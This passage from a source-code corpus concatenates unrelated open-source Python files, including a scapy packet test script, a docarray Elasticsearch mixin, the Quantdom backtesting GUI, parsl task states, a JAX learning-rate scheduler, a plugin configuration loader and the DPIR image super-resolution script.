self.assertAlmostEqual(n4_DX/1.3636363636363638, 1.0, 2)
n1_rxn = system.Nodes['1'].RxnFX['Combo 1']
self.assertAlmostEqual(n1_rxn/-909.0909090909091, 1.0, 2)
n2_rxn = system.Nodes['2'].RxnFX['Combo 1']
self.assertAlmostEqual(n2_rxn/-4090.9090909090914, 1.0, 2)
|
ptf_nn/ptf_nn_test_eth.py | linarnan/ptf | 113 | 47042 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# <NAME> (<EMAIL>)
#
#
import argparse
import scapy.all as sc
parser = argparse.ArgumentParser(description='PTF Nanomsg tester 2')
parser.add_argument(
"--interface", type=str, dest="interface")
parser.add_argument(
"--receive", dest="receive", action='store_true', default=False)
args = parser.parse_args()
def receive(interface):
def printp(p):
print("Received:", p)
sc.sniff(iface=interface, prn=lambda x: printp(x))
def main():
if args.receive:
receive(args.interface)
else: # send one
p = "ab" * 20
sc.sendp(p, iface=args.interface, verbose=0)
if __name__ == '__main__':
main()
|
docarray/array/storage/elastic/seqlike.py | jina-ai/docarray | 591 | 47063 | <filename>docarray/array/storage/elastic/seqlike.py<gh_stars>100-1000
from typing import Union, Iterable, Dict
from ..base.seqlike import BaseSequenceLikeMixin
from .... import Document
class SequenceLikeMixin(BaseSequenceLikeMixin):
"""Implement sequence-like methods for DocumentArray with Elastic as storage"""
def __eq__(self, other):
"""Compare this object to the other, returns True if and only if other
        has the same type as self and other has the same meta information
:param other: the other object to check for equality
:return: ``True`` if other is equal to self
"""
        # two DocumentArrays with Elastic storage are considered the same if they have the same client meta data
return (
type(self) is type(other)
and self._client.get_meta() == other._client.get_meta()
and self._config == other._config
)
def __len__(self):
"""Return the length of :class:`DocumentArray` that uses Elastic as storage
:return: the length of this :class:`DocumentArrayElastic` object
"""
try:
return self._client.count(index=self._config.index_name)["count"]
except:
return 0
def __contains__(self, x: Union[str, 'Document']):
"""Check if ``x`` is contained in this :class:`DocumentArray` with Elastic storage
:param x: the id of the document to check or the document object itself
:return: True if ``x`` is contained in self
"""
if isinstance(x, str):
return self._doc_id_exists(x)
elif isinstance(x, Document):
return self._doc_id_exists(x.id)
else:
return False
def __del__(self):
"""Delete this :class:`DocumentArrayElastic` object"""
self._save_offset2ids()
# if not self._persist:
# self._offset2ids.clear()
def __repr__(self):
"""Return the string representation of :class:`DocumentArrayElastic` object
:return: string representation of this object
"""
return f'<{self.__class__.__name__} (length={len(self)}) at {id(self)}>'
def _upload_batch(self, docs: Iterable['Document']):
batch = []
for doc in docs:
batch.append(self._document_to_elastic(doc))
if len(batch) > self._config.batch_size:
self._send_requests(batch)
self._refresh(self._config.index_name)
batch = []
if len(batch) > 0:
self._send_requests(batch)
self._refresh(self._config.index_name)
def extend(self, docs: Iterable['Document']):
docs = list(docs)
self._upload_batch(docs)
self._offset2ids.extend([doc.id for doc in docs])
|
quantdom/ui.py | HiteshMah-Jan/Quantdom | 578 | 47064 | """Ui."""
import logging
import logging.config
import os.path
from datetime import datetime
from PyQt5 import QtCore, QtGui
from .lib import (
EquityChart,
OptimizatimizedResultsTable,
OptimizationTable,
Portfolio,
QuotesChart,
ResultsTable,
Settings,
Symbol,
TradesTable,
get_quotes,
get_symbols,
strategies_from_file,
)
__all__ = ('MainWidget',)
logger = logging.getLogger(__name__)
DEFAULT_TICKER = 'AAPL'
SYMBOL_COLUMNS = ['Symbol', 'Security Name']
class SymbolsLoaderThread(QtCore.QThread):
symbols_loaded = QtCore.pyqtSignal(object)
def run(self):
symbols = get_symbols()
self.symbols_loaded.emit(symbols[SYMBOL_COLUMNS].values)
class DataTabWidget(QtGui.QWidget):
data_updated = QtCore.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__(parent)
self.select_source = QtGui.QTabWidget(self)
self.select_source.setGeometry(210, 50, 340, 200)
self.init_shares_tab_ui()
self.init_external_tab_ui()
self.symbols_loader = SymbolsLoaderThread()
self.symbols_loader.started.connect(self.on_symbols_loading)
self.symbols_loader.symbols_loaded.connect(
self.on_symbols_loaded, QtCore.Qt.QueuedConnection
)
self.symbols_loader.start()
self.date_from = self.shares_date_from.date().toPyDate()
self.date_to = self.shares_date_to.date().toPyDate()
def init_external_tab_ui(self):
"""External data."""
self.external_tab = QtGui.QWidget()
self.external_tab.setEnabled(False)
self.external_layout = QtGui.QVBoxLayout(self.external_tab)
self.import_data_name = QtGui.QLabel('Import External Data')
self.import_data_label = QtGui.QLabel('...')
self.import_data_btn = QtGui.QPushButton('Import')
self.import_data_btn.clicked.connect(self.open_file)
self.external_layout.addWidget(
self.import_data_name, 0, QtCore.Qt.AlignCenter
)
self.external_layout.addWidget(
self.import_data_label, 0, QtCore.Qt.AlignCenter
)
self.external_layout.addWidget(
self.import_data_btn, 0, QtCore.Qt.AlignCenter
)
self.select_source.addTab(self.external_tab, 'Custom data')
def init_shares_tab_ui(self):
"""Shares."""
self.shares_tab = QtGui.QWidget()
self.shares_layout = QtGui.QFormLayout(self.shares_tab)
today = datetime.today()
self.shares_date_from = QtGui.QDateEdit()
self.shares_date_from.setMinimumDate(QtCore.QDate(1900, 1, 1))
self.shares_date_from.setMaximumDate(QtCore.QDate(2030, 12, 31))
self.shares_date_from.setDate(QtCore.QDate(today.year, 1, 1))
self.shares_date_from.setDisplayFormat('dd.MM.yyyy')
self.shares_date_to = QtGui.QDateEdit()
self.shares_date_to.setMinimumDate(QtCore.QDate(1900, 1, 1))
self.shares_date_to.setMaximumDate(QtCore.QDate(2030, 12, 31))
self.shares_date_to.setDate(
QtCore.QDate(today.year, today.month, today.day)
)
self.shares_date_to.setDisplayFormat('dd.MM.yyyy')
self.shares_symbol_list = QtGui.QComboBox()
self.shares_symbol_list.setFocusPolicy(QtCore.Qt.StrongFocus)
self.shares_symbol_list.setMaxVisibleItems(20)
self.shares_symbol_list.setEditable(True)
self.shares_show_btn = QtGui.QPushButton('Load')
self.shares_show_btn.clicked.connect(self.update_data)
self.shares_layout.addRow('From', self.shares_date_from)
self.shares_layout.addRow('To', self.shares_date_to)
self.shares_layout.addRow('Symbol', self.shares_symbol_list)
self.shares_layout.addRow(None, self.shares_show_btn)
self.select_source.addTab(self.shares_tab, 'Shares/Futures/ETFs')
def on_symbols_loading(self):
self.shares_symbol_list.addItem('Loading...')
self.shares_symbol_list.setEnabled(False)
def on_symbols_loaded(self, symbols):
self.shares_symbol_list.clear()
self.shares_symbol_list.setEnabled(True)
# self.symbols = ['%s/%s' % (ticker, name) for ticker, name in symbols]
# self.shares_symbol_list.addItems(self.symbols)
model = QtGui.QStandardItemModel()
model.setHorizontalHeaderLabels(SYMBOL_COLUMNS)
for irow, (ticker, name) in enumerate(symbols):
model.setItem(irow, 0, QtGui.QStandardItem(ticker))
model.setItem(irow, 1, QtGui.QStandardItem(name))
table_view = QtGui.QTableView()
table_view.setModel(model)
table_view.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
table_view.verticalHeader().setVisible(False)
table_view.setAutoScroll(False)
table_view.setShowGrid(False)
table_view.resizeRowsToContents()
table_view.setColumnWidth(0, 60)
table_view.setColumnWidth(1, 240)
table_view.setMinimumWidth(300)
completer = QtGui.QCompleter(model)
completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
completer.setModel(model)
self.symbols = symbols
self.shares_symbol_list.setModel(model)
self.shares_symbol_list.setView(table_view)
self.shares_symbol_list.setCompleter(completer)
# set default symbol
self.shares_symbol_list.setCurrentIndex(
self.shares_symbol_list.findText(DEFAULT_TICKER)
)
def open_file(self):
        filename, _filter = QtGui.QFileDialog.getOpenFileName(
            parent=None,
            caption='Open a source of data',
            directory=QtCore.QDir.currentPath(),
            filter='All (*);;Text (*.txt)',
        )
        if not filename:
            return
        self.import_data_label.setText('Loading %s' % filename)
with open(filename, 'r', encoding='utf-8') as f:
self.data = f.readlines()
def update_data(self, ticker=None):
ticker = ticker or self.shares_symbol_list.currentText()
self.symbol = Symbol(ticker=ticker, mode=Symbol.SHARES)
self.date_from = self.shares_date_from.date().toPyDate()
self.date_to = self.shares_date_to.date().toPyDate()
get_quotes(
symbol=self.symbol.ticker,
date_from=self.date_from,
date_to=self.date_to,
)
self.data_updated.emit(self.symbol)
class StrategyBoxWidget(QtGui.QGroupBox):
run_backtest = QtCore.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__(parent)
self.setTitle('Strategy')
self.setAlignment(QtCore.Qt.AlignCenter)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.list = QtGui.QComboBox()
self.add_btn = QtGui.QPushButton('+')
self.add_btn.clicked.connect(self.add_strategies)
self.start_btn = QtGui.QPushButton('Start Backtest')
self.start_btn.clicked.connect(self.load_strategy)
self.layout.addWidget(self.list, stretch=2)
self.layout.addWidget(self.add_btn, stretch=0)
self.layout.addWidget(self.start_btn, stretch=0)
self.load_strategies_from_settings()
def reload_strategies(self):
"""Reload user's file to get actual version of the strategies."""
self.strategies = strategies_from_file(self.strategies_path)
def reload_list(self):
self.list.clear()
self.list.addItems([s.get_name() for s in self.strategies])
def load_strategies_from_settings(self):
filename = Settings.value('strategies/path', None)
if not filename or not os.path.exists(filename):
return
self.strategies_path = filename
self.reload_strategies()
self.reload_list()
def save_strategies_to_settings(self):
Settings.setValue('strategies/path', self.strategies_path)
def add_strategies(self):
filename, _filter = QtGui.QFileDialog.getOpenFileName(
self,
caption='Open Strategy.',
directory=QtCore.QDir.currentPath(),
filter='Python modules (*.py)',
)
if not filename:
return
self.strategies_path = filename
self.save_strategies_to_settings()
self.reload_strategies()
self.reload_list()
def load_strategy(self):
self.reload_strategies()
self.run_backtest.emit(self.strategies[self.list.currentIndex()])
class QuotesTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.toolbar_layout = QtGui.QHBoxLayout()
self.toolbar_layout.setContentsMargins(10, 10, 15, 0)
self.chart_layout = QtGui.QHBoxLayout()
self.init_timeframes_ui()
self.init_strategy_ui()
self.layout.addLayout(self.toolbar_layout)
self.layout.addLayout(self.chart_layout)
def init_timeframes_ui(self):
self.tf_layout = QtGui.QHBoxLayout()
self.tf_layout.setSpacing(0)
self.tf_layout.setContentsMargins(0, 12, 0, 0)
time_frames = ('1M', '5M', '15M', '30M', '1H', '1D', '1W', 'MN')
btn_prefix = 'TF'
for tf in time_frames:
btn_name = ''.join([btn_prefix, tf])
btn = QtGui.QPushButton(tf)
# TODO:
btn.setEnabled(False)
setattr(self, btn_name, btn)
self.tf_layout.addWidget(btn)
self.toolbar_layout.addLayout(self.tf_layout)
def init_strategy_ui(self):
self.strategy_box = StrategyBoxWidget(self)
self.toolbar_layout.addWidget(self.strategy_box)
def update_chart(self, symbol):
if not self.chart_layout.isEmpty():
self.chart_layout.removeWidget(self.chart)
self.chart = QuotesChart()
self.chart.plot(symbol)
self.chart_layout.addWidget(self.chart)
def add_signals(self):
self.chart.add_signals()
class EquityTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_chart(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.chart)
self.chart = EquityChart()
self.chart.plot()
self.layout.addWidget(self.chart)
class ResultsTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_table(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.table)
self.table = ResultsTable()
self.table.plot()
self.layout.addWidget(self.table)
class TradesTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
def update_table(self):
if not self.layout.isEmpty():
self.layout.removeWidget(self.table)
self.table = TradesTable()
self.table.plot()
self.layout.addWidget(self.table)
class OptimizationTabWidget(QtGui.QWidget):
optimization_done = QtCore.pyqtSignal()
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.table_layout = QtGui.QHBoxLayout()
self.top_layout = QtGui.QHBoxLayout()
self.top_layout.setContentsMargins(0, 10, 0, 0)
self.start_optimization_btn = QtGui.QPushButton('Start')
self.start_optimization_btn.clicked.connect(self.start_optimization)
self.top_layout.addWidget(
self.start_optimization_btn, alignment=QtCore.Qt.AlignRight
)
self.layout.addLayout(self.top_layout)
self.layout.addLayout(self.table_layout)
def update_table(self, strategy):
if not self.table_layout.isEmpty():
            # close() to avoid a UI issue with duplication of the table
self.table.close()
self.table_layout.removeWidget(self.table)
self.table = OptimizationTable()
self.table.plot(strategy)
self.table_layout.addWidget(self.table)
def start_optimization(self, *args, **kwargs):
logger.debug('Start optimization')
self.table.optimize()
self.optimization_done.emit()
logger.debug('Optimization is done')
class OptimizatimizedResultsTabWidget(QtGui.QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.layout = QtGui.QHBoxLayout(self)
self.layout.setContentsMargins(0, 0, 0, 0)
self.table = OptimizatimizedResultsTable()
self.table.plot()
self.layout.addWidget(self.table)
class MainWidget(QtGui.QTabWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.setDocumentMode(True)
self.data_tab = DataTabWidget(self)
self.data_tab.data_updated.connect(self._update_quotes_chart)
self.addTab(self.data_tab, 'Data')
def _add_quotes_tab(self):
        if self.count() >= 2:  # quotes tab already exists
return
self.quotes_tab = QuotesTabWidget(self)
self.quotes_tab.strategy_box.run_backtest.connect(self._run_backtest)
self.addTab(self.quotes_tab, 'Quotes')
def _add_result_tabs(self):
        if self.count() >= 3:  # tabs already exist
return
self.equity_tab = EquityTabWidget(self)
self.results_tab = ResultsTabWidget(self)
self.trades_tab = TradesTabWidget(self)
self.optimization_tab = OptimizationTabWidget(self)
self.optimization_tab.optimization_done.connect(
self._add_optimized_results
) # noqa
self.addTab(self.equity_tab, 'Equity')
self.addTab(self.results_tab, 'Results')
self.addTab(self.trades_tab, 'Trades')
self.addTab(self.optimization_tab, 'Optimization')
def _update_quotes_chart(self, symbol):
self._add_quotes_tab()
self.symbol = symbol
self.quotes_tab.update_chart(self.symbol)
self.setCurrentIndex(1)
def _run_backtest(self, strategy):
logger.debug('Run backtest')
Portfolio.clear()
stg = strategy(symbols=[self.symbol])
stg.run()
Portfolio.summarize()
self.quotes_tab.add_signals()
self._add_result_tabs()
self.equity_tab.update_chart()
self.results_tab.update_table()
self.trades_tab.update_table()
self.optimization_tab.update_table(strategy=stg)
logger.debug(
'Count positions in the portfolio: %d', Portfolio.position_count()
)
def _add_optimized_results(self):
self.addTab(OptimizatimizedResultsTabWidget(self), 'Optimized Results')
self.setCurrentIndex(self.count() - 1)
def plot_test_data(self):
logger.debug('Plot test data')
self.data_tab.update_data(ticker=DEFAULT_TICKER)
self.quotes_tab.strategy_box.load_strategy()
|
parsl/dataflow/states.py | cylondata/parsl | 323 | 47093 | from enum import IntEnum
class States(IntEnum):
"""Enumerates the states a parsl task may be in.
These states occur inside the task record for a task inside
a `DataFlowKernel` and in the monitoring database.
In a single successful task execution, tasks will progress in this
sequence:
pending -> launched -> running -> exec_done
Other states represent deviations from this path, either due to
failures, or to deliberate changes to how tasks are executed (for
example due to join_app, or memoization).
All tasks should end up in one of the states listed in `FINAL_STATES`.
"""
unsched = -1
pending = 0
"""Task is known to parsl but cannot run yet. Usually, a task cannot
run because it is waiting for dependency tasks to complete.
"""
running = 2
"""Task is running on a resource. This state is special - a DFK task
record never goes to States.running state; but the monitoring database
may represent a task in this state based on non-DFK information received
from monitor_wrapper."""
exec_done = 3
"""Task has been executed successfully."""
failed = 4
"""Task has failed and no more attempts will be made to run it."""
dep_fail = 5
"""Dependencies of this task failed, so it is marked as failed without
even an attempt to launch it."""
launched = 7
"""Task has been passed to a `ParslExecutor` for execution."""
fail_retryable = 8
"""Task has failed, but can be retried"""
memo_done = 9
"""Task was found in the memoization table, so it is marked as done
without even an attempt to launch it."""
joining = 10
"""Task is a join_app, joining on internal tasks. The task has run its
own Python code, and is now waiting on other tasks before it can make
further progress (to a done/failed state)."""
FINAL_STATES = [States.exec_done, States.memo_done, States.failed, States.dep_fail]
"""States from which we will never move to another state, because the job has
either definitively completed or failed."""
FINAL_FAILURE_STATES = [States.failed, States.dep_fail]
"""States which are final and which indicate a failure. This must
be a subset of FINAL_STATES"""
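# --- Illustrative helper (not part of the original module; added as a usage sketch). ---
# It shows how FINAL_STATES is typically consulted; the helper name and parameter are
# assumptions for demonstration only.
def _example_task_is_finished(status: States) -> bool:
    """Return True when a task can no longer move to another state."""
    return status in FINAL_STATES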
|
data_selection/wmt/common.py | DionysisChristopoulos/google-research | 23,901 | 47098 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code from different mains."""
import jax.numpy as jnp
import numpy as np
STEPS_PER_EPOCH = 4500
def create_learning_rate_scheduler(
factors='constant * linear_warmup * rsqrt_decay',
base_learning_rate=0.5,
warmup_steps=1000,
decay_factor=0.5,
steps_per_decay=20000,
steps_per_cycle=100000,
init_step=0,
finetune_lr=False):
"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* rsqrt_normalized_decay: divide by square root of max(step/warmup_steps, 1)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: string, factors separated by "*" that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: int, how many steps to warm up for in the warmup schedule.
decay_factor: float, the amount to decay the learning rate by.
steps_per_decay: int, how often to decay the learning rate.
steps_per_cycle: int, steps per cycle when using cosine decay.
init_step: int, first step of this run. Used with finetune_lr
finetune_lr: bool, modify step count for finetuning smaller datasets
Returns:
a function learning_rate(step): float -> {"learning_rate": float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
if finetune_lr:
steps_this_run = step - init_step
multiplier = STEPS_PER_EPOCH / steps_per_cycle
finetune_steps = steps_this_run * multiplier
step = init_step + finetune_steps
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
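# Usage sketch (illustrative, not part of the original module); the factor string and the
# hyper-parameters below simply repeat the defaults for demonstration:
#   lr_fn = create_learning_rate_scheduler(
#       factors='constant * linear_warmup * rsqrt_decay',
#       base_learning_rate=0.5, warmup_steps=1000)
#   lr = lr_fn(step)  # jnp.float32 scalar: ramps linearly during warmup, then decays ~ 1/sqrt(step)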
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by repeating last slice."""
batch_pad = desired_batch_size - x.shape[0]
return np.concatenate([x, np.tile(x[-1], (batch_pad, 1))], axis=0)
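# Worked example for pad_examples (illustrative only):
#   pad_examples(np.arange(6).reshape(3, 2), 5) repeats the last row twice -> result has shape (5, 2)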
def tohost(x):
"""Collect batches from all devices to host and flatten batch dimensions."""
n_device, n_batch, *remaining_dims = x.shape
return np.array(x).reshape((n_device * n_batch,) + tuple(remaining_dims))
|
Trakttv.bundle/Contents/Libraries/Shared/plugin/core/configuration.py | disrupted/Trakttv.bundle | 1,346 | 47116 | from plugin.core.environment import Environment
from ConfigParser import NoOptionError, NoSectionError, ParsingError, SafeConfigParser
import logging
import os
log = logging.getLogger(__name__)
CONFIGURATION_FILES = [
'advanced'
]
class ConfigurationFile(object):
def __init__(self, path):
self._path = path
self._relpath = os.path.relpath(self._path, Environment.path.plugin_support)
self._parser = None
self._error = False
def __getitem__(self, section):
# Ensure file is loaded
self.load()
# Construct section
return ConfigurationSection(self._parser, section)
def load(self):
if self._parser or self._error:
return
log.debug('Parsing configuration file: %r', self._relpath)
try:
self._parser = SafeConfigParser()
self._parser.read(self._path)
except ParsingError as ex:
log.info(ex.message)
self._parser = None
self._error = True
except Exception as ex:
log.warn('Unable to parse configuration file: %r - %s', self._relpath, ex, exc_info=True)
self._parser = None
self._error = True
class ConfigurationSection(object):
def __init__(self, parser, name):
self._parser = parser
self._name = name
def _get(self, func, key, default=None):
if not self._parser:
return default
if not self._parser.has_option(self._name, key):
return default
try:
return getattr(self._parser, func)(self._name, key)
except (NoSectionError, NoOptionError):
return default
def get(self, key, default=None):
return self._get('get', key, default)
def get_int(self, key, default=None):
return self._get('getint', key, default)
def get_float(self, key, default=None):
return self._get('getfloat', key, default)
def get_boolean(self, key, default=None):
return self._get('getboolean', key, default)
def __getitem__(self, key):
if not self._parser:
return None
return self._parser.get(self._name, key)
def __setitem__(self, key, value):
if not self._parser:
return
self._parser.set(self._name, key, value)
class ConfigurationMeta(type):
def __new__(cls, name, parents, dct):
# Load configuration files
for name in CONFIGURATION_FILES:
# Build path
path = os.path.join(Environment.path.plugin_data, '%s.ini' % name)
# Parse configuration file
dct[name] = ConfigurationFile(path)
# Construct object
return super(ConfigurationMeta, cls).__new__(cls, name, parents, dct)
class Configuration(object):
__metaclass__ = ConfigurationMeta
advanced = None
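# Usage sketch (illustrative only, not part of the original module). The section and option
# names below ('trakt', 'request_timeout', 30) are assumptions for demonstration:
#   timeout = Configuration.advanced['trakt'].get_int('request_timeout', default=30)
# A missing file, section or option falls back to the supplied default instead of raising.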
|
main_dpir_sisr_real_applications.py | HedgehogCode/DPIR | 328 | 47159 | <reponame>HedgehogCode/DPIR<filename>main_dpir_sisr_real_applications.py
import os.path
import glob
import cv2
import logging
import time
import numpy as np
from datetime import datetime
from collections import OrderedDict
import hdf5storage
import torch
from utils import utils_deblur
from utils import utils_logger
from utils import utils_model
from utils import utils_pnp as pnp
from utils import utils_sisr as sr
from utils import utils_image as util
"""
Spyder (Python 3.7)
PyTorch 1.6.0
Windows 10 or Linux
<NAME> (<EMAIL>)
github: https://github.com/cszn/DPIR
https://github.com/cszn/IRCNN
https://github.com/cszn/KAIR
@article{zhang2020plug,
title={Plug-and-Play Image Restoration with Deep Denoiser Prior},
author={<NAME> <NAME> <NAME> <NAME>, <NAME>},
journal={arXiv preprint},
year={2020}
}
% If you have any question, please feel free to contact with me.
% <NAME> (e-mail: <EMAIL>; homepage: https://cszn.github.io/)
by <NAME> (01/August/2020)
# --------------------------------------------
|--model_zoo # model_zoo
|--drunet_gray # model_name, for color images
|--drunet_color
|--testset # testsets
|--results # results
# --------------------------------------------
"""
def main():
"""
# ----------------------------------------------------------------------------------
# In real applications, you should set proper
# - "noise_level_img": from [3, 25], set 3 for clean image, try 15 for very noisy LR images
# - "k" (or "kernel_width"): blur kernel is very important!!! kernel_width from [0.6, 3.0]
# to get the best performance.
# ----------------------------------------------------------------------------------
"""
##############################################################################
testset_name = 'Set3C' # set test set, 'set5' | 'srbsd68'
noise_level_img = 3 # set noise level of image, from [3, 25], set 3 for clean image
    model_name = 'drunet_color'           # set denoiser: 'drunet_gray' | 'drunet_color' | 'ircnn_gray' | 'ircnn_color'
sf = 2 # set scale factor, 1, 2, 3, 4
iter_num = 24 # set number of iterations, default: 24 for SISR
# --------------------------------
# set blur kernel
# --------------------------------
kernel_width_default_x1234 = [0.6, 0.9, 1.7, 2.2] # Gaussian kernel widths for x1, x2, x3, x4
noise_level_model = noise_level_img/255. # noise level of model
kernel_width = kernel_width_default_x1234[sf-1]
"""
# set your own kernel width !!!!!!!!!!
"""
# kernel_width = 1.0
k = utils_deblur.fspecial('gaussian', 25, kernel_width)
k = sr.shift_pixel(k, sf) # shift the kernel
k /= np.sum(k)
##############################################################################
show_img = False
util.surf(k) if show_img else None
x8 = True # default: False, x8 to boost performance
modelSigma1 = 49 # set sigma_1, default: 49
modelSigma2 = max(sf, noise_level_model*255.)
classical_degradation = True # set classical degradation or bicubic degradation
task_current = 'sr' # 'sr' for super-resolution
n_channels = 1 if 'gray' in model_name else 3 # fixed
model_zoo = 'model_zoo' # fixed
testsets = 'testsets' # fixed
results = 'results' # fixed
result_name = testset_name + '_realapplications_' + task_current + '_' + model_name
model_path = os.path.join(model_zoo, model_name+'.pth')
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.cuda.empty_cache()
# ----------------------------------------
# L_path, E_path, H_path
# ----------------------------------------
L_path = os.path.join(testsets, testset_name) # L_path, for Low-quality images
E_path = os.path.join(results, result_name) # E_path, for Estimated images
util.mkdir(E_path)
logger_name = result_name
utils_logger.logger_info(logger_name, log_path=os.path.join(E_path, logger_name+'.log'))
logger = logging.getLogger(logger_name)
# ----------------------------------------
# load model
# ----------------------------------------
if 'drunet' in model_name:
from models.network_unet import UNetRes as net
model = net(in_nc=n_channels+1, out_nc=n_channels, nc=[64, 128, 256, 512], nb=4, act_mode='R', downsample_mode="strideconv", upsample_mode="convtranspose")
model.load_state_dict(torch.load(model_path), strict=True)
model.eval()
for _, v in model.named_parameters():
v.requires_grad = False
model = model.to(device)
elif 'ircnn' in model_name:
from models.network_dncnn import IRCNN as net
model = net(in_nc=n_channels, out_nc=n_channels, nc=64)
model25 = torch.load(model_path)
former_idx = 0
logger.info('model_name:{}, image sigma:{:.3f}, model sigma:{:.3f}'.format(model_name, noise_level_img, noise_level_model))
logger.info('Model path: {:s}'.format(model_path))
logger.info(L_path)
L_paths = util.get_image_paths(L_path)
for idx, img in enumerate(L_paths):
# --------------------------------
# (1) get img_L
# --------------------------------
logger.info('Model path: {:s} Image: {:s}'.format(model_path, img))
img_name, ext = os.path.splitext(os.path.basename(img))
img_L = util.imread_uint(img, n_channels=n_channels)
img_L = util.uint2single(img_L)
img_L = util.modcrop(img_L, 8) # modcrop
# --------------------------------
# (2) get rhos and sigmas
# --------------------------------
rhos, sigmas = pnp.get_rho_sigma(sigma=max(0.255/255., noise_level_model), iter_num=iter_num, modelSigma1=modelSigma1, modelSigma2=modelSigma2, w=1)
rhos, sigmas = torch.tensor(rhos).to(device), torch.tensor(sigmas).to(device)
# --------------------------------
# (3) initialize x, and pre-calculation
# --------------------------------
x = cv2.resize(img_L, (img_L.shape[1]*sf, img_L.shape[0]*sf), interpolation=cv2.INTER_CUBIC)
if np.ndim(x)==2:
x = x[..., None]
if classical_degradation:
x = sr.shift_pixel(x, sf)
x = util.single2tensor4(x).to(device)
img_L_tensor, k_tensor = util.single2tensor4(img_L), util.single2tensor4(np.expand_dims(k, 2))
[k_tensor, img_L_tensor] = util.todevice([k_tensor, img_L_tensor], device)
FB, FBC, F2B, FBFy = sr.pre_calculate(img_L_tensor, k_tensor, sf)
# --------------------------------
# (4) main iterations
# --------------------------------
for i in range(iter_num):
print('Iter: {} / {}'.format(i, iter_num))
# --------------------------------
# step 1, FFT
# --------------------------------
tau = rhos[i].float().repeat(1, 1, 1, 1)
x = sr.data_solution(x, FB, FBC, F2B, FBFy, tau, sf)
if 'ircnn' in model_name:
                current_idx = int(np.ceil(sigmas[i].cpu().numpy()*255./2.)-1)  # np.int is deprecated; use builtin int
if current_idx != former_idx:
model.load_state_dict(model25[str(current_idx)], strict=True)
model.eval()
for _, v in model.named_parameters():
v.requires_grad = False
model = model.to(device)
former_idx = current_idx
# --------------------------------
# step 2, denoiser
# --------------------------------
if x8:
x = util.augment_img_tensor4(x, i % 8)
if 'drunet' in model_name:
x = torch.cat((x, sigmas[i].repeat(1, 1, x.shape[2], x.shape[3])), dim=1)
x = utils_model.test_mode(model, x, mode=2, refield=64, min_size=256, modulo=16)
elif 'ircnn' in model_name:
x = model(x)
if x8:
if i % 8 == 3 or i % 8 == 5:
x = util.augment_img_tensor4(x, 8 - i % 8)
else:
x = util.augment_img_tensor4(x, i % 8)
# --------------------------------
# (3) img_E
# --------------------------------
img_E = util.tensor2uint(x)
util.imsave(img_E, os.path.join(E_path, img_name+'_x'+str(sf)+'_'+model_name+'.png'))
if __name__ == '__main__':
main()
|
nussl/separation/spatial/duet.py | ZhaoJY1/nussl | 259 | 47189 | import numpy as np
from scipy import signal
from .. import MaskSeparationBase
from ...core import utils
from ...core import constants
class Duet(MaskSeparationBase):
"""
The DUET algorithm was originally proposed by S.Rickard and F.Dietrich for DOA
estimation and further developed for BSS and demixing by <NAME>, S.Rickard,
and <NAME>.
